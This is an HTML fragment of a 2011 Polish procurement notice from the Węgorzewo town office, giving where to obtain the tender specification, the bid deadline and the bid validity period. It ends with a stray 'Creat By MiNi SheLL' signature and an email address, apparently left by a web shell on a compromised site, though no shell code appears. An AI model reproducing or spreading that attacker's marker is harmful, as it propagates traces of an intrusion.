<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego 11 - 600 Węgorzewo przy ul. Zamkowej 3 pok. 35, pn.- pt. 800 - 1500 , a także złożyć wniosek o jej przesłanie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2011 godzina 12:00, miejsce: Oferty należy składać w sekretariacie UM w  Węgorzewie przy ul. Zamkowej 3, pok.39 /I - piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com